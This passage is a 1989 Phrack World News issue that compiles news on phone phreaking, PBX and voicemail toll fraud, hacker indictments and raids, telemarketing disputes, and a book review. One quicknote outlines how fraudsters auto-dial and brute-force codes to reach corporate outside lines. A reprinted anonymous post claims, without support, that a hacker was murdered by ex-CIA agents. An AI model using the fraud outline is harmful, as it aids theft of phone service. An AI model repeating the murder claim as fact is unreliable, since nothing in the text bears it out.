  4338. flight number, departure and destination cities, and passenger
  4339. name.  It's that easy!  You can later dial the same access number
  4340. and cancel or modify your itineraries.  The system even includes
  4341. search functions if you don't know the flight number, and an
  4342. extensive help system (just say "How do I make a reservation?").
  4343. _______________________________________________________________________________
  4344.  
  4345. Fighting Back Against Junk Calls                              September 4, 1989
  4346. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "We are not Pavlov's dogs and
  4347. should not have to jump everytime a bell rings."
  4348.  
  4349. And if we do hop to the phone on demand, we ought to be paid for
  4350. it, says Bulmash, president of Private Citizen, Inc., a
  4351. Warrenville, IL organization designed to prevent what Bulmash
  4352. describes as "junk calls" from telemarketers.
  4353.  
  4354. We deserve at least a C-note -- $100, he says.
  4355.  
  4356. Twice a year, Bulmash, age 43, a paralegal by trade, mails a
  4357. directory of people who don't wish to have telephone solicitors
  4358. call them to 600 telemarketing firms.  Along with the
  4359. directories, he sends a contract which states that the people
  4360. listed will listen to the solicitors only in exchange for $100.
  4361.  
  4362. If the solicitors call, the contract says, the telemarketing
  4363. company owes the listener $100.  It's for "use of private
  4364. property -- the phone, your ear, your time," says Bulmash.
  4365.  
  4366. Subscribers, now numbering about 1000, pay $15 per year to be
  4367. listed in the
  4368. Private Citizen directory.
  4369.  
  4370. While Bulmash doesn't guarantee you won't be called, he does
  4371. offer some success stories.  He says subscribers have collected
  4372. anywhere from $5 - $92 from telemarketing companies.  He offers a
  4373. money-back deal for those subscribers not completely satisfied.
  4374. He says only one person has taken him up on it.
  4375.  
  4376. "You can tell those companies 500 times over the phone not to
  4377. call and they won't listen," Bulmash says.  "But when you
  4378. threaten them with charging them for your time, that gets their
  4379. attention."
  4380.  
  4381. Bulmash, who began Private Citizen in May, 1988, says
  4382. telemarketers have the attitude of "we're big business, so you
  4383. just hang up the phone if you don't like us.  I say we have a
  4384. right to be left alone in the first place, at least in our
  4385. homes."  Typically, a telemarketing call to a home has less than
  4386. a 3 percent success rate, he said, with the other 97 percent of
  4387. us -- and we know who we are -- being unnecessarily
  4388. inconvenienced.
  4389.  
  4390. Bulmash says he has testified before Illinois and California
  4391. state legislative committees and has lobbied state and federal
  4392. lawmakers for relief from telemarketers.  He teaches the members
  4393. of his organization how to bill for their time, and in many
  4394. cases, make the charges stick and get payment for "the use of
  4395. their time, ear and phone."
  4396.  
  4397. For more information on Private Citizen, contact Bulmash at
  4398. 312-393-1555.
  4399.  
  4400. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4401.  
  4402. Banned in Boston -- Telemarketer Gets Sued!                  September 14, 1989
  4403. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4404. Alan Schlesinger's stock in trade is suing people.  But you might
  4405. say his stock is too hot to handle at Merrill Lynch these days.
  4406. A Boston lawyer who hates telephone solicitors, Schlesinger sued
  4407. Merrill Lynch after the brokerage firm ignored "repeated
  4408. requests" to quit calling him with investment proposals.
  4409.  
  4410. To Merrill Lynch's surprise, he won an injunction.  Indeed, he
  4411. sued them twice and won both times.  The second time was after an
  4412. unwitting broker called him in violation of the court order
  4413. prohibiting it.
  4414.  
  4415. "This is something that bothers a lot of people, but they don't
  4416. have the sense they can do something about it," said Schlesinger,
  4417. whose best retort is a tort, it would seem.  In the second suit,
  4418. the court awarded him $300, for the costs of his prosecution of
  4419. the matter and for his time spent on the phone with the brokerage
  4420. house's phone room.
  4421.  
  4422. "He is using an atom bomb to deal with a gnat," said William
  4423. Fitzpatrick, chief lawyer for the Securities Industry
  4424. Association, faulting Schlesinger for doing what comes naturally
  4425. for an attorney:  "Being a lawyer myself, I can only guess he
  4426. doesn't have enough brains to just hang up the phone."
  4427. ______________________________________________________________________
  4428.  
  4429.                                 ==Phrack Inc.==
  4430.  
  4431.                     Volume Three, Issue 28, File #12 of 12
  4432.  
  4433.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4434.             PWN                                                 PWN
  4435.             PWN        P h r a c k   W o r l d   N e w s        PWN
  4436.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  4437.             PWN               Issue XXVIII/Part 4               PWN
  4438.             PWN                                                 PWN
  4439.             PWN                 October 7, 1989                 PWN
  4440.             PWN                                                 PWN
  4441.             PWN          Created, Written, and Edited           PWN
  4442.             PWN               by Knight Lightning               PWN
  4443.             PWN                                                 PWN
  4444.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  4445.  
  4446.  
  4447. Woman Indicted As Computer Hacker Mastermind                      June 21, 1989
  4448. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4449. by John Camper (Chicago Tribune)
  4450.  
  4451. A federal grand jury indicated a Chicago woman Tuesday for
  4452. allegedly masterminding a nationwide ring of computer hackers
  4453. that stole more than $1.6 million of telephone and computer
  4454. service from various companies.
  4455.  
  4456. The indictment charges that Leslie Lynne Doucette, 35, of 6748
  4457. North Ashland Ave, and 152 associates shared hundreds of stolen
  4458. credit card numbers by breaking into corporate "voicemail"
  4459. systems and turning them into computer bulletin boards.
  4460.  
  4461. Voicemail is a computerized telephone answering machine.  After a
  4462. caller dials the machine's number he punches more numbers on his
  4463. telephone to place messages in particular voicemail boxes or
  4464. retrieve messages already there.
  4465.  
  4466. The indictment charges that the hacker ring obtained more than
  4467. $9,531.65 of merchandise and $1,453 in Western Union money orders
  4468. by charging them to stolen bank credit card numbers.
  4469.  
  4470. It says the group used stolen computer passwords to obtain
  4471. $38,200 of voicemail service and stolen telephone credit card
  4472. numbers to run up more than $286,362 of telephone service.
  4473.  
  4474. But the biggest haul, more than $1,291,362, according to the
  4475. indictment, represented telephone service that was stolen through
  4476. the use of Private Branch eXchange (PBX) "extender codes."
  4477.  
  4478. A PBX system provides internal telephone service within a
  4479. company.  If a PBX system is equipped with an extender, a person
  4480. can call the PBX system, punch in a code, and dial long distance
  4481. at the expense of the company that owns the
  4482. system.
  4483.  
  4484. The only corporate victims of the alleged fraud named in the
  4485. indictment are August Financial Corporation of Long Beach
  4486. California, and A-1 Beeper Service of Mobile, Alabama.
  4487.  
  4488. Doucette has been held without bond in the Metropolitan
  4489. Correctional Center since May 24, when she was arrested on a raid
  4490. on her apartment that netted 168 telephone credit card numbers
  4491. and 39 extender codes, federal authorities said.  The indictment
  4492. does not name any members of the alleged ring, but authorities
  4493. said the investigation is continuing.
  4494.  
  4495. United States Attorney Anton R. Valukas said the indictment is
  4496. the nation's first involving abuse of voicemail.
  4497.  
  4498. "The proliferation of computer assisted telecommunications and
  4499. the increasing reliance on this equipment by American and
  4500. international business create a potential for serious harm," he
  4501. said.
  4502.  
  4503. Authorities said they discovered the scheme last December after a
  4504. Rolling Meadows real estate broker reported that hackers had
  4505. invaded his company's voicemail system and changed passwords.
  4506.  
  4507. Authorities said they traced the calls into the Rolling Meadows
  4508. voicemail system to telephones in private homes in Chicago,
  4509. Columbus, Ohio, and suburban Detroit, Atlanta and Boston.
  4510.  
  4511. Checks on those phones led them to voicemail systems in companies
  4512. around the country, they said.
  4513.  
  4514. [For more information see Phrack World News XXVII/Part One and
  4515. the article entitled, "Computer Intrusion Network in Detroit,"
  4516. dated as May 25, 1989 --KL]
  4517. _______________________________________________________________________________
  4518.  
  4519. Phreaks Abuse East St. Louis Phone Card
  4520. September 24, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ East
  4521. St. Louis, IL, a dirt-poor minority suburb of the larger Missouri
  4522. city by the same name was victimized for several months by
  4523. phreaks without realizing it until the phone bills for a one year
  4524. period were audited recently.
  4525.  
  4526. According to a recent story in the Belleville, IL
  4527. (News-Democrat), the city is being billed for phone calls to
  4528. dial-a-porn services and from points as far flung as Florida and
  4529. Texas.
  4530.  
  4531. The monthly phone bill for the city of East St. Louis averages
  4532. $5000, and over the past year it has included calls to nearly
  4533. every state as well as to "900" area adult talk lines.  City
  4534. Treasurer Charlotte Moore said the number of questionable calls
  4535. in each month's phone bill, which is usually two inches thick,
  4536. shows the "need for better policing of phones."
  4537.  
  4538. No kidding!  The (News-Democrat) obtained copies of the phone
  4539. bill for several months under the Freedom of Information Act, and
  4540. set about reviewing the places and people called.  For example,
  4541. from March through May of this year, hundreds of dollars in calls
  4542. were made from places in Texas, Florida and elsewhere, and
  4543. charged to a Calling Card number assigned to the city.
  4544.  
  4545. In one instance, a caller in northern Florida made a 288-minute
  4546. call to Miami that cost East St. Louis $39.27.  The
  4547. (News-Democrat) called the Miami number, and reached a man named
  4548. John, who refused to give his last name, and claimed he "...had
  4549. never even heard of East St. Louis..."
  4550.  
  4551. Calls from one certain number in Houston to places all over the
  4552. United States accounted for more than $1000 in charges over
  4553. several months.  A man who answered the phone at the Houston
  4554. number refused to give his name and refused to discuss the
  4555. matter, or explain how his phone might have been used for the
  4556. fraudulent calls.
  4557.  
  4558. Prior to intervention by the newspaper, the city had done
  4559. nothing.  Apparently they were not even aware of the abuse.  On
  4560. notification, the local telco cancelled all outstanding PINS, and
  4561. issued new ones.  Meanwhile, the city of East St. Louis continues
  4562. to plead poverty.  They are barely able to meet payroll for city
  4563. employees, and have skipped a couple of paydays at that.  The
  4564. city has an extremely poor tax base, and will likely file
  4565. bankruptcy in the near future.
  4566. _______________________________________________________________________________
  4567.  
  4568. The Cuckoo's Egg
  4569. October 1, 1989 ~~~~~~~~~~~~~~~~
  4570.     The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer
  4571.          Espionage by Cliff Stoll, Doubleday, 1989, ISBN
  4572.          0-385-24946-2 ($19.95)
  4573.  
  4574.           Book Review by Louise Bernikow, Cosmopolitan, October
  4575. 1989
  4576.  
  4577. Here is a first -- the true story of a man who notices a
  4578. seventy-five cent discrepancy in a computer's accounting system
  4579. and runs the error down until it leads to a real live spy ring.
  4580. Even if you don't know a byte from a bagel, this book will grip
  4581. you on page one and hold you as ferociously as the best mystery
  4582. stories.
  4583.  
  4584. It is astrophysicist-turned-systems-manager Cliff Stoll's first
  4585. week on the job at a lab in Berkeley, California.  The error
  4586. turns up, and he tries to figure out why, partly as an exercise
  4587. in learning about the computer system he's going to be working
  4588. with.  Almost immediately, he discovers that somebody had been
  4589. breaking into the computer network using a fake password.  That
  4590. discovery leads him to other break-ins in other computers,
  4591. including some in military installations.  He alerts the FBI,
  4592. which, since he has lost neither half a million dollars nor any
  4593. classified information, says, "Go away, kid."
  4594.  
  4595. Stoll presses on, sleeping under his desk at night, monitoring
  4596. the system -- a hound waiting for the fox to come out in the
  4597. open.  There is suspense aplenty, but it's the intensely human,
  4598. often funny voice of the man on the trail that makes this book so
  4599. wonderful.  Stoll's girlfriend, Martha, a law student, seems like
  4600. one smart and delightful cookie, and she puts up with his
  4601. obsession pretty well.  In the end, Stoll becomes a national
  4602. hero.  The play-by-play is nothing short of fascinating.
  4603.  
  4604.                   [I wonder if anyone got those cookies --KL]
  4605. _______________________________________________________________________________
  4606.  
  4607. Hackwatch Spokesman Charged
  4608. October 2, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Taken from Computing
  4609. Australia
  4610.  
  4611. Self-styled computer security expert Paul Dummett, alias Stuart
  4612. Gill, has been charged with making false reports to the Victoria
  4613. Police following an investigation into claims he made in the
  4614. daily media late in 1988 and early this year.  The articles often
  4615. quoted Gill, introducing himself as a spokesman for either
  4616. "Hackwatch" or the "DPG monitoring service".
  4617.  
  4618. Gill claimed hackers in Australia had gained access codes from
  4619. others in the US and lifted $500,000 (US) from the International
  4620. Citibank, United States.  Other claims include credit card
  4621. numbers had been posted on bulletin boards for BBS users' access;
  4622. drugs, including steroids, were being sold using bulletin boards;
  4623. evidence of this had been given to the police by informers; and
  4624. in response, the police had raided several hackers' homes.  The
  4625. police, including the Criminal Investigation Bureau and the Fraud
  4626. Squad's Computer Section, repeatedly denied the claims.
  4627.  
  4628. Gill had disappeared, but returned again on September 22 and was
  4629. charged in the Frankston Magistrates' Court under his real name,
  4630. Paul Dummett.  According to court documents, police investigating
  4631. Dummett's claims allegedly found Citibank's computer network had
  4632. not been illegally accessed on its New York number as Dummett had
  4633. claimed.  When Dummett appeared in court his legal aid counsel
  4634. Serge Sztrajt applied successfully to adjourn the case until
  4635. October 20.  Dummett did not enter a plea.
  4636. _______________________________________________________________________________
  4637.  
  4638.                                 PWN Quicknotes ~~~~~~~~~~~~~~ 1.
  4639.                                 Hire A Hacker? -- "Some very
  4640.                                 notable people in the computer
  4641.     industry started out as hackers tinkering around in a
  4642.     mischievous fashion," Ron Gruner, president of Alliant
  4643.     Computer Systems Corporation told Computerworld why he would
  4644.     probably hire Robert T. Morris Jr., of Cornell and creator of
  4645.     Internet worm.  - - - - - - - - - - - - - - - - - - - - - - -
  4646.     - - - - - - - - - - - - - - - - - 2.  Computer Hackers Rip
  4647.     Off Corporate 800 Lines -- Computer hackers pride themselves
  4648.     on never having to pay for long distance calls.  How do they
  4649.     do it?  Sam Daskam, president of Information Security
  4650.     Association (ISA), explains:  Hackers call corporate numbers
  4651.     until they find one with an automated switchboard.  The
  4652.     fingers do not do the walking.  Automatic caller software is
  4653.     used.  Then they link their computer to try all combinations
  4654.     of three or four-digit numbers until they find one which
  4655.     connects them to the company's outside toll or 800 line.
  4656.     Once they get a dial tone, they can make calls anywhere at
  4657.     the firm's expense.  Taken from the Security Letter 1989.  -
  4658.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4659.     - - - - - - - - 3.  900 Service Considered -- There has been
  4660.     talk among some companies about switching from using the 800
  4661.     toll free numbers to 900 numbers since the ease of use of the
  4662.     900 numbers has been shown so vividly.  This would save the
  4663.     corporations a large degree of money.  - - - - - - - - - - -
  4664.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 4.
  4665.     Grocery Store "Hackers" Sell Drugs And Women -- The VMB
  4666.     (voice mailbox) system of a wholesale grocer in Los Angeles
  4667.     was commandeered to a small band of "hackers," who used the
  4668.     system to run a prostitution ring and disseminate data about
  4669.     drugs.  Finally, valid VMB users complained that they could
  4670.     not use the service since their passwords were invalidated.
  4671.     An investigation disclosed that the "hackers" overrode
  4672.     security features and acquired 200 VMBs for their own use.  -
  4673.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4674.     - - - - - - - - 5.  Phone Phreaks Busted In Upstate New York
  4675.     -- Once again it seems that Syracuse, New York is ripe for
  4676.     the picking for law officials to grab hackers involved
  4677.     computer related crimes.  In August the Federal
  4678.     Communications Commission (FCC) put a local area police
  4679.     sergeant in charge of contacting a list of local computer
  4680.     users that were using a local long distance service that
  4681.     offered national and international calling.
  4682.  
  4683.     It seems that one user of the service contacted the company
  4684.     about a large bill, $10,000, that he received.  The company
  4685.     then put a trap on the code and accumulated a list of
  4686.     unauthorized users to that code.  So far the local
  4687.     authorities, the state police, and the FBI have been brought
  4688.     in on the case.  They have been interviewing those on the
  4689.     list and so far most have cooperated fully with the police
  4690.     (most offenders are underage).  One user called Gunter has
  4691.     even allowed the police to use his computer bbs accounts.
  4692.     The service used by those caught (25 people) where to place
  4693.     long distance calls to France, Dominican Republic, Kenya, and
  4694.     Germany.  The callers also used the service to call locally
  4695.     in Syracuse, as one person said that it cleaned up the line
  4696.     noise.  - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4697.     - - - - - - - - - - - - - 6.  Bulletin Board Scanning Saves
  4698.     Boy (August 24, 1989) --Undercover police in San Jose,
  4699.     California, have been watching bulletin boards for several
  4700.     years, looking for computer users who boast about their
  4701.     criminal exploits.  It was such activity that led them to
  4702.     Virginians Dean Ashley Lambey, 34, and Daniel T. Depew, 28,
  4703.     who have been accused of conspiring to kidnap a young boy to
  4704.     be filmed as they molested him and then killed him.  (Article
  4705.     by Tracie L. Thompson of the San Francisco Chronicle.) - - -
  4706.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4707.     - - - - - - 7.  German Hackers Attempt To End Smoking (August
  4708.     29, 1989) -- On Saturday, August 26, 1989, ZDF (the second
  4709.     German television station and one of the 2 nationwide
  4710.     television channels) asked their viewers whether they thought
  4711.     smoking should be banned in public areas.  The viewers could
  4712.     reply by telephone, dialing one telephone number for "yes"
  4713.     and another telephone number for "no."  Within a time frame
  4714.     slot of 14 minutes, 52,942 telephone calls came in, with a
  4715.     ratio of 54:46 in favor of prohibiting smoking.  This means
  4716.     that 29,669 voted in favor of a prohibition, and 25,273
  4717.     opposed it.
  4718.  
  4719.     On Monday, August 28, 1989, a group of South German hackers
  4720.     claimed to have manipulated the quota by dialing the "yes"
  4721.     number with 83 personal computers at a rate of 4 times a
  4722.     minute; virtually all of their calls came through so that
  4723.     about the maximum of 4,648 "yes" votes came from their
  4724.     computers.  These circumstances led to new results in the
  4725.     poll: "Yes" = 25,021 and "No" = 25,273, giving the "no" group
  4726.     a small majority.
  4727.  
  4728.                            Story by Klaus Brunnstein - - - - - -
  4729. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4730. - 8.  Immigration Chief Proposes National Computer Screen (June
  4731. 22,
  4732.     1989) --LA JOLLA, CA, -- The Commissioner of Immigration and
  4733.     Naturalization, Alan C. Nelson, today proposed a nationwide
  4734.     computer system to verify the identities of all job
  4735.     applicants in order to halt the widespread use of fraudulent
  4736.     documents by illegal aliens seeking jobs.
  4737.  
  4738.     Mr. Nelson also suggested standardized identity cards for
  4739.     immigrants so as to get fuller compliance with a 1986 law
  4740.     prohibiting employment of illegal aliens.
  4741.  
  4742.     Creating a national identity card and other ways of checking
  4743.     legal status or identity have been repeatedly suggested in
  4744.     Congress as tools in fighting unlawful immigration, but have
  4745.     also been consistently rejected as potential infringements on
  4746.     civil liberties.
  4747.  
  4748.     The national computerized database on everybody is one bad
  4749.     idea that simply refuses to stay dead, no matter how many
  4750.     times we drive a stake through its heart -- if the INS didn't
  4751.     resurrect it, the drug czar or the FBI would.  "Eternal
  4752.     vigilance..."
  4753.  
  4754.                     Story by Roberto Suro (New York Times) - - -
  4755. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4756. - - - - 9.  West German Computer Hackers Accused Of Spying For
  4757. Soviets
  4758.     (Aug. 17, 1989) -- Associated Press (Frankfurt) -- Three
  4759.     computer hackers, suspected of giving the Soviet Union
  4760.     information from military and industrial computers worldwide,
  4761.     have been indicted on espionage charges, prosecutors said
  4762.     yesterday.  The West German government called the breakup of
  4763.     the spy ring, which gave the KGB secret data from 12
  4764.     countries, including the United States, "a major blow" to the
  4765.     Soviets.  In a four-page statement, Kurt Rebman, the chief
  4766.     federal prosecutor, said it was the first time his office had
  4767.     prosecuted hackers for endangering national security.  Taken
  4768.     from the Boston Globe - - - - - - - - - - - - - - - - - - - -
  4769.     - - - - - - - - - - - - - - - - - - - - 10. Challenge To
  4770.     Phreaks! (August 31, 1989) -- Nippon Telegraph & Telephone
  4771.     Corp. (Tokyo) is offering a $7,000 reward to any person or
  4772.     organization that can invade its FEAL-8 private communication
  4773.     and data system, according to an Associated Press report that
  4774.     NTT America Inc. officials could not confirm.  The reward
  4775.     offer supposedly expires 8/31/91.  No telephone number or
  4776.     other information was included.  Taken from the Wall Street
  4777.     Journal.  - - - - - - - - - - - - - - - - - - - - - - - - - -
  4778.     - - - - - - - - - - - - - - 11. Shadow Stalker Loses Out
  4779.     (August 7, 1989) -- A 17-year-old Michigan boy has been
  4780.     charged with posting stolen long-distance telephone codes on
  4781.     a bulletin board system operated in his home.  Brent G.
  4782.     Patrick, alias "Shadow Stalker" online, was arraigned this
  4783.     week on one count of stealing or retaining a financial
  4784.     transaction device without consent.  Patrick was released on
  4785.     $2,500 bond, pending his hearing.  The youth faces a maximum
  4786.     of four years in prison and a $2,000 fine if convicted.  His
  4787.     bulletin board, Wizard Circle, has been closed.  - - - - - -
  4788.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4789.     - - - 12. Philadelphia Hackers Change Speed Limit -- Recently
  4790.     an unknown hacker got into the computer that controlled the
  4791.     speed limit on the Burlington-Bristol Bridge.  He proceeded
  4792.     to change the speed limit from 45 m.p.h. to 75 m.p.h. A lot
  4793.     of people were stopped and ticketed and judges say they will
  4794.     not hear any appeals because, "the public should know better
  4795.     than that no matter what the sign says."  The police claim to
  4796.     have leads, however this is doubtful.  - - - - - - - - - - -
  4797.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 13.
  4798.     Two Story Jump To Escape From Secret Service (July 26, 1989)
  4799.     -- Red Rebel, a known hacker in Florida was busted by the
  4800.     United States Secret Service and local authorities.  It seems
  4801.     that in attempt to to escape he actually jumped out a second
  4802.     story window and ran for a while.  The Secret Service
  4803.     confiscated two computers and a load of disks.
  4804.  
  4805.     To make matters worse, similar to Oryan QUEST, Red Rebel is
  4806.     not an American citizen and is likely to be deported.  Red
  4807.     Rebel is charged with resisting arrest, interfering with
  4808.     evidence, and something concerning credit card fraud.
  4809.     Information provided by The Traxster.  - - - - - - - - - - -
  4810.     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 14.
  4811.     Fraud Alert (September 1989) -- PBX fraud is busting out all
  4812.     over.  Long distance carriers are being overwhelmed by
  4813.     corporate customers demanding refunds for fraud perpetrated
  4814.     on them.  No long distance carrier covers their customer's
  4815.     long-term fraud.  If you got fraud you got to pay.  This is
  4816.     not like stolen credit cards.  This is real serious stuff.
  4817.     Thieves are dialing into 800 INWATS lines and, via auto
  4818.     attendants, hacking their way to overseas.  The big calls go
  4819.     to drug-related countries, especially Colombia, Pakistan,
  4820.     Dominican Republic, and Ecuador.  But no one really knows
  4821.     which countries are drug-related and which aren't.  Taken
  4822.     from Teleconnect Magazine.  - - - - - - - - - - - - - - - - -
  4823.     - - - - - - - - - - - - - - - - - - - - - - - 15. Motorola
  4824.     Introduces Network Encryption System (August 4, 1989) --
  4825.     Motorola Government Equipment Group (GEG) has introduced its
  4826.     Network Encryption System (NES), which features the latest in
  4827.     security services for the protection of Local Area Networks
  4828.     (LANs).  Designed in accordance with Secure Data Network
  4829.     System (SDNS) standards including SDNS electronic key
  4830.     management, the NES is a flexible internet security solution
  4831.     for Type I applications.
  4832.  
  4833.     The NES is unique in COMSEC technology because the protocol
  4834.     software is loaded via diskette.  The NES is installed in the
  4835.     drop cable between the computer and the transceiver, or as a
  4836.     gateway device separating a LAN from a backbone network.  The
  4837.     product supports both DoD and ISO internet standards allowing
  4838.     protection over wide area networks.
  4839.  
  4840.     The initial product accommodates connection to IEEE 802.3 and
  4841.     IEEE 802.4 medias.  Motorola Inc. has a Memorandum of
  4842.     Agreement with the National Security Agency and anticipates
  4843.     product endorsement in the first quarter of next year.  The
  4844.     LAN product represents the first of a family of SDNS products
  4845.     that will provide complete, interoperable system security
  4846.     solutions.  Additional information on the NES can be obtained
  4847.     from Joe Marino at (602) 441-5827.  - - - - - - - - - - - - -
  4848.     - - - - - - - - - - - - - - - - - - - - - - - - - - - 16. The
  4849.     Death of Shadow 2600:  No Accident (July 6, 1989) -- The
  4850.     following is a message taken from The Central Office:
  4851.  
  4852.                      89Jul06 from fdg @ The Central Office
  4853.  
  4854.     MY CONDOLENCES TO DAVE FLORY'S FAMILY AND FRIENDS.  Do you
  4855.     all realize WHY a 22 year old died?  It says one thing to me.
  4856.     He was killed by some insane ex-CIA types.  Most likely under
  4857.     orders from the idiots who tried to prosecute him in 1985.
  4858.     This kind of thing is getting more common under President
  4859.     Bush.  He ran the CIA, and he is now encouraging the same
  4860.     dirty tricks to silence people who cause "problems."  Abbie
  4861.     Hoffman was done in the same way.  A small hypodermic full of
  4862.     prussic aced.  You will hear about more ex-hippies, yippies,
  4863.     and hackers/phreaks dying mysteriously in the foreseeable
  4864.     future.
  4865.  
  4866.     You have been warned.  And who am I to know all this?
  4867.     Believe me, friends, I am highly placed in the government.
  4868.     You will see more friends die.  You may laugh now, but I
  4869.     decided to leave a public message in hopes of saving a few
  4870.     lives.
  4871.                            Special Thanks to Epsilon
  4872. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4873. 17. Legion Of Doom Members Raided In Atlanta (July 21, 1989) --
  4874.     The Leftist, The Urvile, and The Prophet, all of the world
  4875.     famous hacking group known as the Legion of Doom, were raided
  4876.     on July 21, 1989.  The day in question is interesting because
  4877.     two years prior, that was the same day that a nationwide
  4878.     sweep netted over 80 hackers across the country including
  4879.     famous names such as Oryan QUEST, Solid State, and Bill From
  4880.     RNOC.
  4881.  
  4882.     The charges against the LOD members range from toll fraud to
  4883.     illegal entry into government computer systems, although as
  4884.     it is told, the government systems were entered by the Urvile
  4885.     and the other two had nothing to do with it.  Currently, all
  4886.     three LOD-Atlanta members are still waiting to find out what
  4887.     will happen to them as charges have not yet been brought
  4888.     against them, very similar to what happened to the hackers in
  4889.     1987.
  4890.  
  4891.     It has been said by security personnel at Michigan Bell that
  4892.     these LOD busts were a spinoff of the supposed arrest of Fry
  4893.     Guy on July 19 for his role in the Delray Beach, Florida
  4894.     probation officer scam (detailed last issue).  It is believe
  4895.     that he had been working closely with LOD-Atlanta (especially
  4896.     The Leftist) and when caught for the probation office scam,
  4897.     he got scared and turned over what he knew about LOD.
  4898. _____________________________________________________________________
  4899.  
  4900.  
  4901.